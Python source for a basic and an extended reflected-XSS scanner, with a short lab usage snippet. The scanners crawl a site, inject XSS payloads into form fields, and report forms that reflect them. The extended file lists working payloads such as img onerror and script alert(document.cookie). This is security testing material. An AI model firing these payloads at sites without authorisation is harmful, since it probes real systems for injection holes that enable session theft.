xss_scanner.py
import requests
from pprint import pprint
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin


def get_all_forms(url):
    """Given a `url`, it returns all forms from the HTML content"""
    soup = bs(requests.get(url).content, "html.parser")
    return soup.find_all("form")


def get_form_details(form):
    """
    This function extracts all possible useful information about an HTML `form`
    """
    details = {}
    # get the form action (target url)
    action = form.attrs.get("action", "").lower()
    # get the form method (POST, GET, etc.)
    method = form.attrs.get("method", "get").lower()
    # get all the input details such as type and name
    inputs = []
    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        inputs.append({"type": input_type, "name": input_name})
    # put everything into the resulting dictionary
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details


def submit_form(form_details, url, value):
    """
    Submits a form given in `form_details`
    Params:
        form_details (dict): a dictionary that contains form information
        url (str): the original URL that contains that form
        value (str): this will be replaced for all text and search inputs
    Returns the HTTP Response after form submission
    """
    # construct the full URL (if the URL provided in the action is relative)
    target_url = urljoin(url, form_details["action"])
    # get the inputs
    inputs = form_details["inputs"]
    data = {}
    for input in inputs:
        # replace all text and search values with `value`
        if input["type"] == "text" or input["type"] == "search":
            input["value"] = value
        input_name = input.get("name")
        input_value = input.get("value")
        if input_name and input_value:
            # if the input name and value are not None,
            # then add them to the form submission data
            data[input_name] = input_value
    print(f"[+] Submitting malicious payload to {target_url}")
    print(f"[+] Data: {data}")
    if form_details["method"] == "post":
        return requests.post(target_url, data=data)
    else:
        # GET request
        return requests.get(target_url, params=data)


def scan_xss(url):
    """
    Given a `url`, it prints all XSS vulnerable forms and
    returns True if any is vulnerable, False otherwise
    """
    # get all the forms from the URL
    forms = get_all_forms(url)
    print(f"[+] Detected {len(forms)} forms on {url}.")
    js_script = "<Script>alert('hi')</scripT>"
    # returning value
    is_vulnerable = False
    # iterate over all forms
    for form in forms:
        form_details = get_form_details(form)
        content = submit_form(form_details, url, js_script).content.decode()
        if js_script in content:
            print(f"[+] XSS Detected on {url}")
            print("[*] Form details:")
            pprint(form_details)
            is_vulnerable = True
            # won't break because we want to print other available vulnerable forms
    return is_vulnerable


if __name__ == "__main__":
    import sys
    url = sys.argv[1]
    print(scan_xss(url))
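If the listing above is saved as xss_scanner.py, it can also be driven from another script instead of the command line. The snippet below is a minimal usage sketch; the target URL is a placeholder for a page you are authorized to test (for example, a local DVWA or similar deliberately vulnerable lab), not a value taken from the original code.

# Minimal usage sketch: import the scanner and point it at a lab target.
# The URL below is a hypothetical placeholder; replace it with a page you
# are allowed to test.
from xss_scanner import scan_xss

if __name__ == "__main__":
    target = "http://localhost/dvwa/vulnerabilities/xss_r/"  # hypothetical lab URL
    if scan_xss(target):
        print("At least one vulnerable form was found.")
    else:
        print("No reflected payloads detected.")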
xss_scanner_extended.py
import requests  # requests library for making HTTP requests
from pprint import pprint  # pprint for pretty-printing data structures
from bs4 import BeautifulSoup as bs  # BeautifulSoup for HTML parsing
from urllib.parse import urljoin, urlparse  # utilities for URL manipulation
from urllib.robotparser import RobotFileParser  # RobotFileParser for parsing robots.txt files
from colorama import Fore, Style  # colorama for colored terminal output
import argparse  # argparse for command-line argument parsing

# List of XSS payloads to test forms with
XSS_PAYLOADS = [
    '"><svg/onload=alert(1)>',
    '\'><svg/onload=alert(1)>',
    '<img src=x onerror=alert(1)>',
    '"><img src=x onerror=alert(1)>',
    '\'><img src=x onerror=alert(1)>',
    "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//--></script>",
    "<Script>alert('XSS')</scripT>",
    "<script>alert(document.cookie)</script>",
]

# global variable to store all crawled links
crawled_links = set()


def print_crawled_links():
    """Print all crawled links"""
    print(f"\n[+] Links crawled:")
    for link in crawled_links:
        print(f"    {link}")
    print()


# Function to get all forms from a given URL
def get_all_forms(url):
    """Given a `url`, it returns all forms from the HTML content"""
    try:
        # Using BeautifulSoup to parse the HTML content of the URL
        soup = bs(requests.get(url).content, "html.parser")
        # Finding all form elements in the HTML
        return soup.find_all("form")
    except requests.exceptions.RequestException as e:
        # Handling exceptions if there's an error in retrieving forms
        print(f"[-] Error retrieving forms from {url}: {e}")
        return []


# Function to extract details of a form
def get_form_details(form):
    """This function extracts all possible useful information about an HTML `form`"""
    details = {}
    # Extracting the form action and method
    action = form.attrs.get("action", "").lower()
    method = form.attrs.get("method", "get").lower()
    inputs = []
    # Extracting input details within the form
    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        inputs.append({"type": input_type, "name": input_name})
    # Storing form details in a dictionary
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details


# Function to submit a form with a specific value
def submit_form(form_details, url, value):
    """
    Submits a form given in `form_details`
    Params:
        form_details (dict): a dictionary that contains form information
        url (str): the original URL that contains that form
        value (str): this will be replaced for all text and search inputs
    Returns the HTTP Response after form submission
    """
    # Constructing the absolute form action URL
    target_url = urljoin(url, form_details["action"])
    inputs = form_details["inputs"]
    data = {}
    # Filling form inputs with the provided value
    for input in inputs:
        if input["type"] == "text" or input["type"] == "search":
            input["value"] = value
        input_name = input.get("name")
        input_value = input.get("value")
        if input_name and input_value:
            data[input_name] = input_value
    try:
        # Making the HTTP request based on the form method (POST or GET)
        if form_details["method"] == "post":
            return requests.post(target_url, data=data)
        else:
            return requests.get(target_url, params=data)
    except requests.exceptions.RequestException as e:
        # Handling exceptions if there's an error in form submission
        print(f"[-] Error submitting form to {target_url}: {e}")
        return None


def get_all_links(url):
    """Given a `url`, it returns all links from the HTML content"""
    try:
        # Using BeautifulSoup to parse the HTML content of the URL
        soup = bs(requests.get(url).content, "html.parser")
        # Finding all anchor elements in the HTML
        return [urljoin(url, link.get("href")) for link in soup.find_all("a")]
    except requests.exceptions.RequestException as e:
        # Handling exceptions if there's an error in retrieving links
        print(f"[-] Error retrieving links from {url}: {e}")
        return []


# Function to scan for XSS vulnerabilities
def scan_xss(args, scanned_urls=None):
    """
    Given a `url`, it prints all XSS vulnerable forms and returns True
    if any is vulnerable, None if already scanned, False otherwise
    """
    global crawled_links
    if scanned_urls is None:
        scanned_urls = set()
    # Checking if the URL has already been scanned
    if args.url in scanned_urls:
        return
    # Adding the URL to the set of scanned URLs
    scanned_urls.add(args.url)
    # Getting all forms from the given URL
    forms = get_all_forms(args.url)
    print(f"\n[+] Detected {len(forms)} forms on {args.url}")
    # Parsing the URL to get the domain
    parsed_url = urlparse(args.url)
    domain = f"{parsed_url.scheme}://{parsed_url.netloc}"
    if args.obey_robots:
        robot_parser = RobotFileParser()
        robot_parser.set_url(urljoin(domain, "/robots.txt"))
        try:
            robot_parser.read()
        except Exception as e:
            # Handling exceptions if there's an error in reading robots.txt
            print(f"[-] Error reading robots.txt file for {domain}: {e}")
            crawl_allowed = False
        else:
            crawl_allowed = robot_parser.can_fetch("*", args.url)
    else:
        crawl_allowed = True
    if crawl_allowed or parsed_url.path:
        for form in forms:
            form_details = get_form_details(form)
            form_vulnerable = False
            # Testing each form with the XSS payloads
            for payload in XSS_PAYLOADS:
                response = submit_form(form_details, args.url, payload)
                if response and payload in response.content.decode():
                    print(f"\n{Fore.GREEN}[+] XSS Vulnerability Detected on {args.url}{Style.RESET_ALL}")
                    print("[*] Form Details:")
                    pprint(form_details)
                    print(f"{Fore.YELLOW}[*] Payload: {payload} {Style.RESET_ALL}")
                    # Save to a file if an output file is provided
                    if args.output:
                        with open(args.output, "a") as f:
                            f.write(f"URL: {args.url}\n")
                            f.write(f"Form Details: {form_details}\n")
                            f.write(f"Payload: {payload}\n")
                            f.write("-" * 50 + "\n\n")
                    form_vulnerable = True
                    break  # No need to try other payloads for this endpoint
            if not form_vulnerable:
                print(f"{Fore.MAGENTA}[-] No XSS vulnerability found on {args.url}{Style.RESET_ALL}")
    # Crawl links if the option is enabled
    if args.crawl:
        print(f"\n[+] Crawling links from {args.url}")
        try:
            # Crawling links from the given URL
            links = get_all_links(args.url)
        except requests.exceptions.RequestException as e:
            # Handling exceptions if there's an error in crawling links
            print(f"[-] Error crawling links from {args.url}: {e}")
            links = []
        for link in set(links):  # Removing duplicates
            if link.startswith(domain):
                crawled_links.add(link)
                if args.max_links and len(crawled_links) >= args.max_links:
                    print(f"{Fore.CYAN}[-] Maximum links ({args.max_links}) limit reached. Exiting...{Style.RESET_ALL}")
                    print_crawled_links()
                    exit(0)
                # Recursively scanning XSS vulnerabilities for crawled links
                args.url = link
                link_vulnerable = scan_xss(args, scanned_urls)
                if not link_vulnerable:
                    continue


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Extended XSS Vulnerability scanner script.")
    parser.add_argument("url", help="URL to scan for XSS vulnerabilities")
    parser.add_argument("-c", "--crawl", action="store_true", help="Crawl links from the given URL")
    # Maximum number of visited links
    parser.add_argument("-m", "--max-links", type=int, default=0,
                        help="Maximum number of links to visit. Default 0, which means no limit.")
    parser.add_argument("--obey-robots", action="store_true", help="Obey robots.txt rules")
    parser.add_argument("-o", "--output", help="Output file to save the results")
    args = parser.parse_args()
    scan_xss(args)  # Initiating the XSS vulnerability scan
    print_crawled_links()